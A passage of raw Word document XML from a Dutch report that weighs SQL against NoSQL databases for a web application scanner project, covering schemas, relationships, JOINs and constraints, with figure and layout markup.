      <w:r w:rsidR="006408EE">
        <w:t xml:space="preserve">De vraag is dus welke van de twee DBMS soorten is het meest geschikt </w:t>
      </w:r>
      <w:r w:rsidR="008611BE">
        <w:t xml:space="preserve">voor de </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="008611BE">
        <w:t xml:space="preserve">? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53278E22" w14:textId="3723901D" w:rsidR="00DF4B4F" w:rsidRPr="0081699B" w:rsidRDefault="009C6F4A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081699B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL of NOSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146D688" w14:textId="1054BC12" w:rsidR="007C58F2" w:rsidRDefault="005E28D3">
      <w:r>
        <w:t>NOSQL is geen nieuwe technologie dat SQL vervangt, het gebruikt e</w:t>
      </w:r>
      <w:r w:rsidR="00863B97">
        <w:t xml:space="preserve">en ander manier van dataopslag. </w:t>
      </w:r>
      <w:r w:rsidR="005D663B">
        <w:t>Geen is beter, het hangt af van de type applicatie die gebruikt maakt van een DBMS</w:t>
      </w:r>
      <w:r w:rsidR="00487ED3">
        <w:t xml:space="preserve">. Voor sommige applicaties is SQL meer geschikt en voor andere NOSQL. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189752BC" w14:textId="72464A54" w:rsidR="007C58F2" w:rsidRDefault="005204B6">
      <w:r>
        <w:t>In figuur 3.5.2 zijn de twee soorten dat</w:t>
      </w:r>
      <w:r w:rsidR="004A1858">
        <w:t xml:space="preserve">abases geïllustreerd, </w:t>
      </w:r>
      <w:r w:rsidR="005432FD">
        <w:t>links</w:t>
      </w:r>
      <w:r w:rsidR="007C58F2">
        <w:t xml:space="preserve"> een relationele</w:t>
      </w:r>
      <w:r w:rsidR="004A1858">
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
      <w:r w:rsidR="007C58F2">
        <w:t xml:space="preserve"> en rechts een non-relationele database. De relationele database</w:t>
      </w:r>
      <w:r w:rsidR="004A1858">
        <w:t xml:space="preserve"> heeft een tabel structuur met kolommen en rijen.</w:t>
      </w:r>
      <w:r w:rsidR="00875BD2">
        <w:t xml:space="preserve"> De verbinding lijn tussen de beide tabellen noem je een relatie. In deze instantie is het een één op veel relatie. </w:t>
      </w:r>
      <w:r w:rsidR="0055389B">
        <w:t>De hele tekening noem je een Schema wat de blauwdruk is van een database.</w:t>
      </w:r>
      <w:r w:rsidR="007C58F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467747DB" w14:textId="77777777" w:rsidR="00A71F83" w:rsidRDefault="00672B40" w:rsidP="00A86F2C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251851776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F83E44F" wp14:editId="34C428D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>456565</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3721100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4160520" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="465" name="Tekstvak 465"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4160520" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4E20C143" w14:textId="7EAEA5F9" w:rsidR="00CE4BB5" w:rsidRPr="001C726A" w:rsidRDefault="00CE4BB5" w:rsidP="00A435BE">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur 3.5.2.1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83E44F" id="Tekstvak 465" o:spid="_x0000_s1056" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:35.95pt;margin-top:293pt;width:327.6pt;height:21.25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7NTzkCAABsBAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EWMtaRKgYFdMk1FaC&#10;qc/GcYhVx+edDQn79Ts7hG7dnqa9OOe789nf991ldtfWhh0Veg0256PBkDNlJRTa7nP+bbv6cMOZ&#10;D8IWwoBVOT8pz+/m79/NGjdVY6jAFAoZFbF+2ricVyG4aZZ5Wala+AE4ZSlYAtYi0Bb3WYGioeq1&#10;ycbD4SRrAAuHIJX35L3vgnye6pelkuGxLL0KzOSc3hbSimndxTWbz8R0j8JVWp6fIf7hFbXQli69&#10;lLoXQbAD6j9K1VoieCjDQEKdQVlqqRIGQjMavkGzqYRTCQuR492FJv//ysqH4xMyXeT8anLNmRU1&#10;ibRVLz4cxQuLPmKocX5KiRtHqaH9DC0p3fs9OSPwtsQ6fgkSozhxfbrwq9rAJDmvRpPh9ZhCkmLj&#10;ye3Np1Q+ez3t0IcvCmoWjZwj6ZdoFce1D/QSSu1T4mUejC5W2pi4iYGlQXYUpHVT6aDiG+nEb1nG&#10;xlwL8VQXjp4sQuygRCu0uzaRMv7Y49xBcSL4CF0LeSdXmi5cCx+eBFLPECyag/BIS2mgyTmcLc4q&#10;wB9/88d8kpKinDXUgzn33w8CFWfmqyWRY8P2BvbGrjfsoV4CQR3RhDmZTDqAwfRmiVA/03gs4i0U&#10;ElbSXTkPvbkM3STQeEm1WKQkaksnwtpunIyle2K37bNAd5YlkKAP0HenmL5Rp8tN+rjFIRDVSbpI&#10;bMfimW9q6aTPefzizPy6T1mvP4n5TwAAAP//AwBQSwMEFAAGAAgAAAAhACUz+FbiAAAACgEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMjzFPwzAQhXck/oN1SCyIOgltEkIuVVXBQJeK0IXNjd04ENtR7LTh&#10;33NMMJ7u03vfK9ez6dlZjb5zFiFeRMCUbZzsbItweH+5z4H5IKwUvbMK4Vt5WFfXV6UopLvYN3Wu&#10;Q8soxPpCIOgQhoJz32hlhF+4QVn6ndxoRKBzbLkcxYXCTc+TKEq5EZ2lBi0GtdWq+aong7Bffuz1&#10;3XR63m2WD+PrYdqmn22NeHszb56ABTWHPxh+9UkdKnI6uslKz3qELH4kEmGVp7SJgCzJYmBHhDTJ&#10;V8Crkv+fUP0AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAyE7NTzkCAABsBAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAJTP4VuIAAAAKAQAADwAA&#10;AAAAAAAAAAAAAACRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4E20C143" w14:textId="7EAEA5F9" w:rsidR="00CE4BB5" w:rsidRPr="001C726A" w:rsidRDefault="00CE4BB5" w:rsidP="00A435BE">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 3.5.2.1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251849728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B979405" wp14:editId="76A3BB61">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>448310</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1120775</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4835525" cy="2545080"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="463" name="Afbeelding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database.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4835525" cy="2545080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007C58F2">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:r w:rsidR="00961CF9">
        <w:t>non-relationele</w:t>
      </w:r>
      <w:r w:rsidR="007C58F2">
        <w:t xml:space="preserve"> database </w:t>
      </w:r>
      <w:r w:rsidR="005432FD">
        <w:t xml:space="preserve">slaat data op in een document bestand. De data heeft een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005432FD">
        <w:t>key-value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005432FD">
        <w:t xml:space="preserve"> structuur</w:t>
      </w:r>
      <w:r w:rsidR="004D04F3">
        <w:t xml:space="preserve"> en wordt in de meeste gevallen geschreven in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004D04F3">
        <w:t>JSON annotatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004D04F3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F01113">
        <w:t xml:space="preserve">NOSQL is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F01113">
        <w:t>bedoelt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F01113">
        <w:t xml:space="preserve"> voor een groot hoeveelheid, ongestructureerde data.</w:t>
      </w:r>
      <w:r w:rsidR="007C58F2">
        <w:t xml:space="preserve"> Met dit soort data</w:t>
      </w:r>
      <w:r w:rsidR="00C92390">
        <w:t xml:space="preserve"> is het moeili</w:t>
      </w:r>
      <w:r w:rsidR="007C58F2">
        <w:t xml:space="preserve">jk om een duidelijk gedefinieerde schema te maken. </w:t>
      </w:r>
      <w:r w:rsidR="00F01113">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00894EA5">
        <w:t xml:space="preserve">NOSQL maakt geen gebruik van relaties maar van Collecties van data. Als er </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00894EA5">
        <w:t>Comments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00894EA5">
        <w:t xml:space="preserve"> voor een specifieke blog opgehaald moet worden dan moet je dat specificeren</w:t>
      </w:r>
      <w:r w:rsidR="006D2236">
        <w:t xml:space="preserve"> in de Query door gebruik te maken van indexen</w:t>
      </w:r>
      <w:r w:rsidR="00D130F1">
        <w:t xml:space="preserve">, of </w:t>
      </w:r>
      <w:r w:rsidR="00AD7F02">
        <w:t xml:space="preserve">sub </w:t>
      </w:r>
      <w:r w:rsidR="00D130F1">
        <w:t xml:space="preserve">arrays. </w:t>
      </w:r>
      <w:r w:rsidR="006D2236">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005432FD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C87BD11" w14:textId="1C56BC02" w:rsidR="00C512E3" w:rsidRPr="00A71F83" w:rsidRDefault="008D7B58" w:rsidP="00A86F2C">
      <w:r w:rsidRPr="001A1584">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Voordelen van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A1584">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00C512E3" w:rsidRPr="001A1584">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6C3FF9F0" w14:textId="4EF70E6E" w:rsidR="003449F8" w:rsidRDefault="00F6720F" w:rsidP="006749F6">
      <w:r>
        <w:t>SQL is een ANSI</w:t>
      </w:r>
      <w:r w:rsidR="004940EC" w:rsidRPr="004940EC">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="004940EC">
        <w:t>/ISO</w:t>
      </w:r>
      <w:r w:rsidR="004940EC" w:rsidRPr="004940EC">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> standaardtaal voor relationel</w:t>
      </w:r>
      <w:r w:rsidR="00913CFB">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00A94361">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A94361">
        <w:t>DBM systemen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0018361E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003449F8">
        <w:t xml:space="preserve">Omdat het gestandaardiseerd is kan het bijna met elke </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009166F4">
        <w:t xml:space="preserve">software </w:t>
      </w:r>
      <w:r w:rsidR="003449F8">
        <w:t>systeem</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003449F8">
        <w:t xml:space="preserve"> geïntegreerd worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EF84E0" w14:textId="28D4FAA9" w:rsidR="00F6720F" w:rsidRDefault="006B3DC0" w:rsidP="006749F6">
      <w:r>
        <w:t xml:space="preserve">Een sterke punt van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQL databases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is het gebruik van SQL als operatieve taal. </w:t>
      </w:r>
      <w:r w:rsidR="007E38C1">
        <w:t xml:space="preserve">Met deze taal kun je query’s uitvoeren waarmee data opgehaald kan worden, gewijzigd, geüpdatet en verwijderd. Het is een declaratieve taal </w:t>
      </w:r>
      <w:r w:rsidR="00605FC9">
        <w:t xml:space="preserve">wat het schrijven van query’s makkelijk maakt. Bij declaratieve talen schrijft je wat er moet gebeuren i.p.v. hoe het moet gebeuren. Dit maakt het een krachtige taal met een lage leercurve. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6E1546" w14:textId="463B0FB4" w:rsidR="005527CF" w:rsidRDefault="00EB3BF5" w:rsidP="006749F6">
      <w:r>
        <w:t xml:space="preserve">Een ander sterk punt van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQL databases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is dat zij gebruik maken van gestructureerde schema waar</w:t>
      </w:r>
      <w:r w:rsidR="001A7036">
        <w:t>mee</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A7036">
        <w:t xml:space="preserve">op een georganiseerde manier data </w:t>
      </w:r>
      <w:r w:rsidR="000C45FD">
        <w:t>kan worden</w:t>
      </w:r>
      <w:r w:rsidR="001A7036">
        <w:t xml:space="preserve"> opgeslagen. </w:t>
      </w:r>
      <w:r w:rsidR="005527CF">
        <w:t>Bij het maken van een schema wordt er eerst wat voorbereidend werkt gedaan, zoals het identificeren van entiteiten en het normaliseren daarvan, dit wordt gedaan om redundantie binnen het database structuur te verminderen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB3775E" w14:textId="6B32FBB5" w:rsidR="001311F0" w:rsidRDefault="00F6720F" w:rsidP="006749F6">
      <w:r>
        <w:t>Een schema bestaat zoal</w:t>
      </w:r>
      <w:r w:rsidR="00273A69">
        <w:t>s in figuur 3.5.2 uit tabellen, deze zijn met</w:t>
      </w:r>
      <w:r w:rsidR="002806A8">
        <w:t xml:space="preserve"> elkaar verbonden door relaties wat een ander voordeel is. Database engineers kunnen relaties tussen tabellen definiëren om zo afhankelijkheid</w:t>
      </w:r>
      <w:r w:rsidR="004C7FCB">
        <w:t xml:space="preserve"> tussen de tabellen</w:t>
      </w:r>
      <w:r w:rsidR="002806A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F97F99">
        <w:t xml:space="preserve">te creëren. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F52F8FB" w14:textId="5918C2AF" w:rsidR="001311F0" w:rsidRPr="001311F0" w:rsidRDefault="001311F0" w:rsidP="006749F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001311F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Relaties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F1A8D7" w14:textId="02C90905" w:rsidR="001311F0" w:rsidRDefault="001311F0" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Één</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> op één</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756BC301" w14:textId="274DDC41" w:rsidR="001311F0" w:rsidRDefault="001311F0" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Één</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> op veel relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3034BA" w14:textId="6D7C6680" w:rsidR="00815674" w:rsidRDefault="001311F0" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Veel op veel relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68607EA5" w14:textId="1E4E136A" w:rsidR="00923179" w:rsidRDefault="00815674" w:rsidP="006749F6">
      <w:r>
        <w:t xml:space="preserve">Zoals in figuur 3.5.2 is aangegeven is tabel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> afhankelijk van tabel Blog met een één op veel relatie. Een ander krachtige functie van SQL is het gebruik van JOINS. JOINS worden gebruikt bij het selecteren van data uit meerdere tabellen.</w:t>
      </w:r>
      <w:r w:rsidR="00360FE5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00210206">
        <w:t>SQL databases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00360FE5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00210206">
        <w:t xml:space="preserve">maken </w:t>
      </w:r>
      <w:r w:rsidR="00015151">
        <w:t xml:space="preserve">gebruik van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00015151">
        <w:t>Constraints</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00015151">
        <w:t xml:space="preserve"> (beperkingen) binnen het systeem. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00697D89">
        <w:t>Contraints</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BB150F">
        <w:t xml:space="preserve"> zijn regels waar een tabel zich aan moet houden zo kan het de invoer van specifieke data types limiteren of ervoor zorgen dat velden niet leeg mogen zijn</w:t>
      </w:r>
      <w:r w:rsidR="00D95EAA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB150F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F528751" w14:textId="19E4B9D5" w:rsidR="00923179" w:rsidRPr="00923179" w:rsidRDefault="00923179" w:rsidP="006749F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Aantal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Contrains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="253BB437" w14:textId="77777777" w:rsidR="00923179" w:rsidRPr="00923179" w:rsidRDefault="00923179" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>NOT  NULL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01932794" w14:textId="77777777" w:rsidR="00923179" w:rsidRPr="00923179" w:rsidRDefault="00923179" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>UNIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5A3B65" w14:textId="6F63155A" w:rsidR="00226425" w:rsidRPr="00815674" w:rsidRDefault="00923179" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CHECK</w:t>
      </w:r>
      <w:r w:rsidR="00D95EAA" w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD0A070" w14:textId="2AC1C063" w:rsidR="00280322" w:rsidRPr="00714FFE" w:rsidRDefault="003B36E6" w:rsidP="00CB23AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Samengevat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC633E" w14:textId="3008945D" w:rsidR="004A20C8" w:rsidRDefault="00063668" w:rsidP="00CB23AC">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQL databases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bieden de middelen aan, om gestructureerde databases te ontwerpen en bouwen en waar, op een georganiseerde manier data in kan worden opgeslagen.</w:t>
      </w:r>
      <w:r w:rsidR="00085B18">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00085B18">
        <w:t>SQL databases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00085B18">
        <w:t xml:space="preserve"> gebruik je wanneer het een eis is van het systeem dat data op een gestructureerde en georganiseerde manier moet wor</w:t>
      </w:r>
      <w:r w:rsidR="00D71AFF">
        <w:t xml:space="preserve">den opgeslagen en wanneer het systeem de invoer van data limiteert met </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D71AFF">
        <w:t>Constrains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D71AFF">
        <w:t xml:space="preserve"> (beperkingen)</w:t>
      </w:r>
      <w:r w:rsidR="00E152B3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16202F" w14:textId="77777777" w:rsidR="00B36377" w:rsidRDefault="00B36377">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3FB3C9" w14:textId="797FEF8E" w:rsidR="00C57E4A" w:rsidRPr="00CC4DB8" w:rsidRDefault="00C57E4A" w:rsidP="006749F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4DB8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Voordelen van een NO-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC4DB8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="180B91D2" w14:textId="292E82AC" w:rsidR="00EE1C30" w:rsidRDefault="00260C22">
      <w:r>
        <w:t>Wanneer er een grote hoeveelheid data aanwezig is</w:t>
      </w:r>
      <w:r w:rsidR="00F63AE2">
        <w:t xml:space="preserve"> en het is niet mogelijk om een ervoor gedefinieerde structuur te ontwerpen </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dan is het niet verstandig om het in een relationele database op te slaan. </w:t>
      </w:r>
      <w:r w:rsidR="00844C28">
        <w:t>NOSQL biedt hier een oplossing voor,</w:t>
      </w:r>
      <w:r w:rsidR="00FC6D67">
        <w:t xml:space="preserve"> het is geschikt voor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FC6D67">
        <w:t>web applicaties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FC6D67">
        <w:t xml:space="preserve"> met grootschalige databases die geen gebruik maken van r</w:t>
      </w:r>
      <w:r w:rsidR="00844C28">
        <w:t xml:space="preserve">elationele schema en </w:t>
      </w:r>
      <w:r w:rsidR="00FC6D67">
        <w:t xml:space="preserve">die </w:t>
      </w:r>
